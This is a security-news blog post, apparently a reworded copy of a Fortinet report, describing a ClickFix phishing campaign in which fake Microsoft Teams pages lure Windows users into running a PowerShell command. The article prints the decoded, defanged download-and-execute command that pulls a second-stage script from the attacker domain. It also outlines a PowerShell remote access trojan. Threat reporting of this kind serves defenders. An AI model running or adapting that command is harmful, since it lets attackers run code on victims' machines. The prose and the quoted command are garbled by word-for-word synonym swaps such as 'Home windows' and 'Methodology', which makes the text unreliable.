Skip to content
  • Blog Home
  • Cyber Map
  • About Us – Contact
  • Disclaimer
  • Terms and Rules
  • Privacy Policy
Cyber Web Spider Blog – News

Cyber Web Spider Blog – News

Globe Threat Map provides a real-time, interactive 3D visualization of global cyber threats. Monitor DDoS attacks, malware, and hacking attempts with geo-located arcs on a rotating globe. Stay informed with live logs and archive stats.

  • Home
  • Cyber Map
  • Cyber Security News
  • Security Week News
  • The Hacker News
  • How To?
  • Toggle search form

Hackers Using ClickFix Technique to Attack Windows Machine and Execute Powershell Commands

Posted on August 12, 2025August 12, 2025 By CWS

A complicated new assault marketing campaign has emerged concentrating on Israeli companies and infrastructure sectors via a misleading social engineering approach often known as “ClickFix,” which methods customers into executing malicious PowerShell instructions on their Home windows methods.

The multi-stage assault chain begins with phishing emails disguised as invites to academic webinars about dealing with wartime medical provides, demonstrating how menace actors exploit present regional tensions to reinforce their social engineering effectiveness.

Assault move chart (Supply – Fortinet)

The assault operates via a fastidiously orchestrated sequence that begins when victims click on on embedded hyperlinks in phishing emails, redirecting them to spoofed Microsoft Groups pages.

These pretend touchdown pages instruct customers to carry out a selected sequence of actions: urgent Home windows+R to open the Run dialog field, pasting a copied string utilizing Ctrl+V, and urgent Enter to execute what seems to be a reliable verification course of.

Nevertheless, this sequence truly triggers the execution of a malicious PowerShell command that initiates the an infection chain.

Fortinet analysts recognized this focused intrusion marketing campaign via their FortiMail Workspace Safety staff, revealing that the complete assault depends solely on PowerShell execution with out requiring exterior executables.

The researchers found proof of lateral motion and surveillance exercise, together with potential overlaps with MuddyWater marketing campaign ways, although attribution stays inconclusive attributable to notable tactical variations from conventional MuddyWater operations.

The preliminary payload incorporates a Base64-encoded PowerShell command obfuscated throughout three strings inside the phishing website’s HTML code.

As soon as concatenated and decoded, it produces the next command:-

powershell IEX ((Invoke-RestMethod -Uri hxxps[:]//pharmacynod[.]com/Repair -Methodology GET)[.]be aware[.]physique)

This command initiates the retrieval and execution of a secondary PowerShell script from the attacker’s infrastructure, establishing the muse for the entire compromise of the goal system.

Multi-Stage Obfuscation and Payload Supply

The assault employs subtle obfuscation methods that reveal superior technical capabilities.

After the preliminary payload execution, the malware downloads two crucial information: check.html, which incorporates a blob object with binary information encoded between particular tag markers, and a secondary PowerShell script that reconstructs the ultimate malicious payload.

Script infinite loop (Supply – Fortinet)

The script employs a singular decoding mechanism that splits binary-encoded chunks separated by the delimiter “kendrick,” converts them from binary to ASCII characters, and reassembles the consequence into executable PowerShell code.

The ultimate stage deploys a distant entry trojan totally via PowerShell, establishing persistent communication with the command and management server at pharmacynod[.]com.

The malware implements a number of stealth methods together with GZip compression, Base64 encoding, string reversal, and bonafide Person-Agent strings to evade detection whereas sustaining steady surveillance capabilities on compromised methods.

Equip your SOC with full entry to the most recent menace information from ANY.RUN TI Lookup that may Enhance incident response -> Get 14-day Free Trial

Cyber Security News Tags:Attack, ClickFix, Commands, Execute, Hackers, Machine, PowerShell, Technique, Windows

Post navigation

Previous Post: Linux Legitimate System Behaviours Weaponized to Harvest Secrets from Shared Environments
Next Post: Researchers Details Masking Malicious Scripts and Bypass Defense Mechanisms

Related Posts

Securing Multi-Cloud Infrastructures in 2025 Enterprise Deployments Cyber Security News
Hackers Use AI Platforms to Steal Microsoft 365 Credentials in Phishing Campaign Cyber Security News
New Vulnerabilities in React Server Components Allow DoS Attacks and Source Code Leaks Cyber Security News
FileFix Attack Exploits Windows Browser Features to Bypass Mark-of-the-Web Protection Cyber Security News
Renting Android Malware With 2FA Interception, AV Bypass is Getting Cheaper Now Cyber Security News
How to Solve Alert Fatigue in Your SOC without Extra Staff or Effort Cyber Security News

Categories

  • Cyber Security News
  • How To?
  • Security Week News
  • The Hacker News

Recent Posts

  • Leveraging OSINT Tools for Enhanced Cybersecurity Threat Intelligence
  • Data Breach at Texas Gas Station Operator Exposes Info of 377,000+ Customers
  • MuddyWater Launches RustyWater RAT via Spear-Phishing Across Middle East Sectors
  • Europol Arrests 34 Black Axe Members in Spain Over €5.9M Fraud and Organized Crime
  • New MacSync Stealer Uses Signed macOS App to Evade Gatekeeper and Steal Data

Pages

  • About Us – Contact
  • Disclaimer
  • Privacy Policy
  • Terms and Rules

Archives

  • January 2026
  • December 2025
  • November 2025
  • October 2025
  • September 2025
  • August 2025
  • July 2025
  • June 2025
  • May 2025

Recent Posts

  • Leveraging OSINT Tools for Enhanced Cybersecurity Threat Intelligence
  • Data Breach at Texas Gas Station Operator Exposes Info of 377,000+ Customers
  • MuddyWater Launches RustyWater RAT via Spear-Phishing Across Middle East Sectors
  • Europol Arrests 34 Black Axe Members in Spain Over €5.9M Fraud and Organized Crime
  • New MacSync Stealer Uses Signed macOS App to Evade Gatekeeper and Steal Data

Pages

  • About Us – Contact
  • Disclaimer
  • Privacy Policy
  • Terms and Rules

Categories

  • Cyber Security News
  • How To?
  • Security Week News
  • The Hacker News

Copyright © 2026 Cyber Web Spider Blog – News.

Powered by PressBook Masonry Dark